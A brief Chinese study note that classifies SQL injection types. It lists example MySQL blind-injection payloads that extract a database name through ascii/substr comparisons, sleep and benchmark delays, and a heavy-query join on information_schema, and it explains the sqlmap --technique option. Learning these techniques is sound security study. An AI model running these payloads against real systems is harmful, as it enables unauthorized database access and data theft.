SQL注入的分类
- 基于报错的注入
- 基于布尔类型的盲注
select length(database())
select ascii(substr(database(), 1, 1)) >= 115
- 基于时间的盲注
sleep()和benchmark
if(ascii(substr(database(), 1, 1)) = 115, 1,sleep(3))
if(ascii(substr(database(), 1, 1)) = 115, 1, benchmark(10000000,md5(1)))
heavy query通常选用两张较大的表进行笛卡尔积
select 1 and if(ascii(substr(database(), 1, 1))=115,(select count(*) from information_schema.tables A,information_schema.tables B,information_schema.tables C),1)
- 宽字节注入
- 联合查询
- 堆叠注入
sqlmap使用--technique=TECH指定测试类型
--technique=BEUSTQ
默认全选
Boolean-based blind
Error-based
Union query-based
Stacked queries(对文件系统、操作系统、注册表操作时,必须指定该方式)
Time-based blind